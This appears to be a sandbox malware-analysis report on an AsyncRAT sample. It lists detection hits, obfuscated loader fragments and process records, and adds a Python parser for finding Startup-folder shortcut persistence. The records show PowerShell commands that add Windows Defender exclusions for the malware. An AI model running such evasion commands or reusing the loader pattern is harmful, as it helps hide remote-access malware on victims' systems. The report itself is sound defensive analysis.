Source: 0.0.VJV2AjJ7Na.exe.7f0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.2103665413.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: VJV2AjJ7Na.exe, llVL2VVPJ9sap5xkkujGTYTBVxb.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: VJV2AjJ7Na.exe, llVL2VVPJ9sap5xkkujGTYTBVxb.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: VJV2AjJ7Na.exe, Zrb0Vg2QW2gl3HnbQPJCExDoMYJ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.0.dr, llVL2VVPJ9sap5xkkujGTYTBVxb.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.0.dr, llVL2VVPJ9sap5xkkujGTYTBVxb.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: XClient.exe.0.dr, Zrb0Vg2QW2gl3HnbQPJCExDoMYJ.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: VJV2AjJ7Na.exe, Dclwxq6mfdANal90RGxsbeoxR5awlvQz06uUP1YaZ9L0NzHmmAaFSgWj81yNHZwEMkYOjwLb7r6lSbYGDZKRo.cs | Base64 encoded string: 'Q5z0VXv61cBchtHKGCFACYiHuq339xFy9BTy5eIa2lN1nahsTD5kHJTb62j0'
Source: XClient.exe.0.dr, Dclwxq6mfdANal90RGxsbeoxR5awlvQz06uUP1YaZ9L0NzHmmAaFSgWj81yNHZwEMkYOjwLb7r6lSbYGDZKRo.cs | Base64 encoded string: 'Q5z0VXv61cBchtHKGCFACYiHuq339xFy9BTy5eIa2lN1nahsTD5kHJTb62j0'
Source: VJV2AjJ7Na.exe, NGwHDYzHApMBmpHhtkW6w5wNpRc.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: VJV2AjJ7Na.exe, NGwHDYzHApMBmpHhtkW6w5wNpRc.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: XClient.exe.0.dr, NGwHDYzHApMBmpHhtkW6w5wNpRc.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: XClient.exe.0.dr, NGwHDYzHApMBmpHhtkW6w5wNpRc.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.evad.winEXE@13/19@3/3
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | File created: C:\Users\user\AppData\Roaming\XClient.exe
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Mutant created: \Sessions\1\BaseNamedObjects\WkXFk9DuzSngGyjx
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1616:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4032:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxmi3xvi.024.ps1
Source: VJV2AjJ7Na.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: VJV2AjJ7Na.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: VJV2AjJ7Na.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | File read: C:\Users\user\Desktop\VJV2AjJ7Na.exe
Source: unknown | Process created: C:\Users\user\Desktop\VJV2AjJ7Na.exe "C:\Users\user\Desktop\VJV2AjJ7Na.exe"
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VJV2AjJ7Na.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, sxs.dll, mpr.dll, scrrun.dll, linkinfo.dll, ntshrui.dll, cscapi.dll, secur32.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, avicap32.dll, msvfw32.dll, winmm.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, amsi.dll, msasn1.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll, microsoft.management.infrastructure.native.unmanaged.dll, mi.dll, miutils.dll, wmidcom.dll, dpapi.dll, wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                          Source: XClient.lnk.0.drLNK file: ..\..\..\..\..\XClient.exe
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                          Source: VJV2AjJ7Na.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: VJV2AjJ7Na.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
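The XClient.lnk row above is the sample's persistence mechanism: a shortcut dropped into the per-user Startup folder whose RELATIVE_PATH string climbs five directories (Startup, Programs, Start Menu, Windows, Microsoft) and lands in the Roaming profile, which is exactly where the report later shows XClient.exe being written. The following is an added Python example, not code from the report or from the sample: it parses the StringData section of a Shell Link as laid out in MS-SHLLINK and resolves the relative path against the Startup directory without touching the filesystem. The .lnk bytes it parses are constructed inside the block to carry the RELATIVE_PATH value from the finding; they are not the sample's real XClient.lnk, and STARTUP_DIR is the sandbox user's path taken from the report.

```python
import struct
from pathlib import PureWindowsPath
from typing import Optional

# LinkFlags bits from MS-SHLLINK 2.1.1 (only the ones this parser needs).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

HEADER_SIZE = 0x4C
SHELL_LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# StringData fields in the order the format stores them.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields of a Shell Link as a dict.

    Skips the optional LinkTargetIDList and LinkInfo structures, which is all
    that is needed to reach RELATIVE_PATH; ExtraData after the strings is ignored.
    """
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != SHELL_LINK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        pos += 2 + struct.unpack_from("<H", data, pos)[0]  # IDListSize excludes itself
    if flags & HAS_LINK_INFO:
        pos += struct.unpack_from("<I", data, pos)[0]      # LinkInfoSize includes itself
    fields = {}
    for flag, name in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]     # CountCharacters, no terminator
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        pos += count * width
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return fields


def resolve_relative(base_dir: str, relative: str) -> str:
    """Resolve a Windows relative path against base_dir purely lexically."""
    parts = list(PureWindowsPath(base_dir).parts)
    for seg in PureWindowsPath(relative).parts:
        if seg == "..":
            if len(parts) > 1:  # never climb above the drive root
                parts.pop()
        elif seg != ".":
            parts.append(seg)
    return str(PureWindowsPath(*parts))


# Startup folder of the sandbox user, as named in the report.
STARTUP_DIR = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"


def startup_lnk_target(lnk_bytes: bytes, startup_dir: str = STARTUP_DIR) -> Optional[str]:
    """Where a Startup-folder shortcut points, or None if it has no RELATIVE_PATH."""
    rel = parse_lnk_strings(lnk_bytes).get("relative_path")
    return resolve_relative(startup_dir, rel) if rel else None


def build_sample_lnk(relative_path: str) -> bytes:
    """Constructed minimal .lnk (header plus one RELATIVE_PATH string) for the demo.
    This is not the sample's real XClient.lnk, only a file carrying its RELATIVE_PATH."""
    header = bytearray(HEADER_SIZE)
    struct.pack_into("<I", header, 0, HEADER_SIZE)
    header[4:20] = SHELL_LINK_CLSID
    struct.pack_into("<I", header, 20, HAS_RELATIVE_PATH | IS_UNICODE)
    return bytes(header) + struct.pack("<H", len(relative_path)) + relative_path.encode("utf-16-le")


if __name__ == "__main__":
    lnk = build_sample_lnk(r"..\..\..\..\..\XClient.exe")
    print(parse_lnk_strings(lnk))
    print(startup_lnk_target(lnk))  # C:\Users\user\AppData\Roaming\XClient.exe
```

On a real host, feed `startup_lnk_target` the bytes of every .lnk under the user's Startup folder and compare the resolved target against the paths of recently written executables; a shortcut whose relative path escapes the Start Menu tree into %APPDATA% is the pattern this report shows.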

                          Data Obfuscation

                          Source: VJV2AjJ7Na.exe, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{jKUhhyNoAJUFWqyteGPWRmgpLpp.JWxWVRR8m4ncuMVk64eui5s8Ll2,jKUhhyNoAJUFWqyteGPWRmgpLpp._2YdhfA909rflCAePy1icb5XzLkz,jKUhhyNoAJUFWqyteGPWRmgpLpp.yNzZZeBmK9g29TQ3D21L5zMXRbj,jKUhhyNoAJUFWqyteGPWRmgpLpp.wam9XgvPkIMos3noQq1MScny9SX,llVL2VVPJ9sap5xkkujGTYTBVxb.Giwvr1HIqR3x7dbExfXg9vpjB2XFPhMaTcmzjbin3QAXmB8OdbBM5QUNYsGv()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: VJV2AjJ7Na.exe, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{gbFCU5IOSxPP7T70NiIafF5Xqmc[2],llVL2VVPJ9sap5xkkujGTYTBVxb._52qDsxtYeZYyeylsTZdEq8wXJ41kEaynG9hXm6oULPxWU0C2LbL0zJCQ9d1c(Convert.FromBase64String(gbFCU5IOSxPP7T70NiIafF5Xqmc[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: XClient.exe.0.dr, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{jKUhhyNoAJUFWqyteGPWRmgpLpp.JWxWVRR8m4ncuMVk64eui5s8Ll2,jKUhhyNoAJUFWqyteGPWRmgpLpp._2YdhfA909rflCAePy1icb5XzLkz,jKUhhyNoAJUFWqyteGPWRmgpLpp.yNzZZeBmK9g29TQ3D21L5zMXRbj,jKUhhyNoAJUFWqyteGPWRmgpLpp.wam9XgvPkIMos3noQq1MScny9SX,llVL2VVPJ9sap5xkkujGTYTBVxb.Giwvr1HIqR3x7dbExfXg9vpjB2XFPhMaTcmzjbin3QAXmB8OdbBM5QUNYsGv()}}, (string[])null, (Type[])null, (bool[])null, true)
                          Source: XClient.exe.0.dr, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{gbFCU5IOSxPP7T70NiIafF5Xqmc[2],llVL2VVPJ9sap5xkkujGTYTBVxb._52qDsxtYeZYyeylsTZdEq8wXJ41kEaynG9hXm6oULPxWU0C2LbL0zJCQ9d1c(Convert.FromBase64String(gbFCU5IOSxPP7T70NiIafF5Xqmc[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                           Source: VJV2AjJ7Na.exe, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs | .Net Code: CtarBZ1HEXsD94arDPmFsMJ2orj System.AppDomain.Load(byte[])
                           Source: VJV2AjJ7Na.exe, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs | .Net Code: eXWsLQ0lsaD65gxIKoFJUlUSNNK System.AppDomain.Load(byte[])
                           Source: VJV2AjJ7Na.exe, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs | .Net Code: eXWsLQ0lsaD65gxIKoFJUlUSNNK
                           Source: XClient.exe.0.dr, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs | .Net Code: CtarBZ1HEXsD94arDPmFsMJ2orj System.AppDomain.Load(byte[])
                           Source: XClient.exe.0.dr, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs | .Net Code: eXWsLQ0lsaD65gxIKoFJUlUSNNK System.AppDomain.Load(byte[])
                           Source: XClient.exe.0.dr, TL5ZLP2aSyZRMX7Ku4rOLWRjSrj.cs | .Net Code: eXWsLQ0lsaD65gxIKoFJUlUSNNK
                           Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Code function: 0_2_00007FFD3469792B push ebx; retf 0_2_00007FFD3469796A
                           Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Code function: 0_2_00007FFD346986F2 pushad ; ret 0_2_00007FFD34698719
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD3457D2A5 pushad ; iretd 2_2_00007FFD3457D2A6
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34762316 push 8B485F91h; iretd 2_2_00007FFD3476231B
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFD3457D2A5 pushad ; iretd 5_2_00007FFD3457D2A6
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 5_2_00007FFD34762316 push 8B485F91h; iretd 5_2_00007FFD3476231B
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD3456D2A5 pushad ; iretd 8_2_00007FFD3456D2A6
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFD34752316 push 8B485F92h; iretd 8_2_00007FFD3475231B
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD3454D2A5 pushad ; iretd 10_2_00007FFD3454D2A6
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD346620C2 push ebx; retf 10_2_00007FFD346620C3
                           Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFD34732316 push 8B485F94h; iretd 10_2_00007FFD3473231B
                          Source: VJV2AjJ7Na.exe, jKUhhyNoAJUFWqyteGPWRmgpLpp.csHigh entropy of concatenated method names: 'mfVbCuCNZasZDZreMS904bwKapj9Vz2wfKNogpljqsPuv', 'Gg4zNv53TuNwvAQCIqfJWzonXQp4mWWHj7Ie6npEYQChM', 'v4alJqUW46v4wWSnmFm5iw99rbSSbDY2u3NQZ4orbOEph', 'Ll0SRvYpMaesFYYzUHrqKl5Lw3kyY1t04eBy8pByMIqr0'
                          Source: VJV2AjJ7Na.exe, YsN02iaBQuXyZWv7DixuCPmBXWwN2ds2fU0kL0FSjgeViMXx0QEgCCgNVPpd.csHigh entropy of concatenated method names: 'fEqXIn2R713lg1Afq1Ekp3dWoyp0kRM2rKomPnusXouXc3sgyz5XHWRzMztY', 'JlmxmxDnMNmNrfO60n9by9fRLJ2WYBoZwN8GWn8Gpjnci5GzZbD0QY3HLwFv', 'LWiita0dCeFnEUC6wV5bnsT8AiicWr5DglOtCVUwGiqgkexvNVVdervr2w9k', 'ulzyQeELsJZZweTsDIogXVubfi6SdA5SrlKPheIFXDA9oHrJr3YSCHNLOPTQqr', 'nNv4XK3RO20t5nlvvxJ0ogLM4ObUkWtDAHHtsGUCVOUCSD9PJXa3Y7xlSjqerx', 'CQ0Fv18LqIiCwbfcuuC1gbyTOcthOB8Ng5LOTkneXQ5H8qdvGvHeJkIqsnkkf6', 'lOhno887cCEryUJqA9jjJlNa5KylvsVr10YjmerhyWsgV5adrGSYqlRUmGUgIi', 'XhXTCUyuDtworTrGxsbeYmxryjo7ObRbK8wtCbUFH1tZ6r1sTjn0jE4rlU1lMZ', 'ICXsKgKUmIjya0PNKEcNfP9MZeUNMmUFJBVvmR38W4ZaTORR4zmkIs584nhhxS', 'm12R9Fdt9ltHQadKFGw8XVloAljN26OVgjPH90ge7zyk2ICj8roq6sGsdFIXaM'
                          Source: VJV2AjJ7Na.exe, cChbrHmQNgN8mmZ98E8AsEPgqWN.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'Ugd2JoN2SW0mzJpuZN82ym08KpWhJdNAWB8BuWpOF4VyM', 'FstFJYjQL0oMfaiRskqfb6PrYdtuWSGdfQ91zQPcTIIM9', 'jL7nI81K42U0X1bOw85qKlMjaDKeP3Fb8Vt5w23JaCMLD', '_7i83NGQwecXMg9NTHQDJAIwsnzXzYC5Kg1R6WtBjYXK5P'
                          Source: VJV2AjJ7Na.exe, wZBvGNYQHp0pdqeFieqC06ydodU.csHigh entropy of concatenated method names: 'tCBmqjcy2cHzHnjZFROdkXE2wyK', 'ZXJ0AecGWeMzAEhmlMZu4lUssqH3NzXwqk8Y4j4lnCptWwnwNlj1czdmFwdEfwBvgo2xfmVCaDjCU', 'bsInprFMhSDLMSX9ivxZ1zg4dQ5gg9zeADq9tGAzNqaO1c6o5fHvE7at9OIQ6W9ExoMIbGx31wwlo', 'wwXPyXW5TeS2Hc2kMBNQXHWntIFvwTrNhXFL1thorQNzORRTZxrUhUbgSUibfhKoJteY6Fsc9KtVI', 'ZcLc4Ki3E7pEYuJOJChVNUnH9n5BeKUIq1vj9hqWIxFCBp8aGAH8RDM8HIcdSYgtl5cXGrCzK1p8p'
